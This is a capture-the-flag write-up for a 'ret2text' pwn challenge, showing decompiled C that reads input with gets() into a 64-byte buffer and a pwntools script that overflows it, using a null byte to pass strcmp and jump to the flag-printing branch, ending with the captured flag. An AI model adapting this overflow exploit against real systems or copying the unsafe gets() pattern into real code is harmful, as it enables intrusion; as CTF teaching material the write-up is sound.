Tags: ret2text pwn
Rating:
IDA decompile:
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main(void) {
setbuf(stdout, NULL);
char input[64];
volatile int give_flag = 0;
puts("hi, how can i help?");
gets(input);
if (strcmp(input, "give me the flag") == 0) {
puts("lol no");
} else if (strcmp(input, "please give me the flag") == 0) {
puts("no");
} else if (strcmp(input, "help, i have no idea how to solve this") == 0) {
puts("L");
} else if (strcmp(input, "may i have the flag?") == 0) {
puts("not with that attitude");
} else if (strcmp(input, "please please please give me the flag") == 0) {
puts("i'll consider it");
sleep(15);
if (give_flag) {
puts("ok here's your flag");
system("cat flag.txt");
} else {
puts("no");
}
} else {
puts("sorry, i didn't understand your question");
exit(1);
}
}
```
Simple ret2text. Use `'\0'` to bypass `strcmp()` and get the address of `give_flag` branch using IDA(graph mode). The length of payload is the size of all stack variables plus 4(to reach `rip`). The following exploit script can be constructed:
```py
from pwn import *
# context(log_level='debug',os='linux',arch='amd64')
payload = b'please please please give me the flag\0'.ljust(64+4+4,b'a')+p64(0x40128E)
p = remote('lac.tf',31180)
p.sendline(payload)
p.interactive()
# lactf{hey_stop_bullying_my_bot_thats_not_nice}
```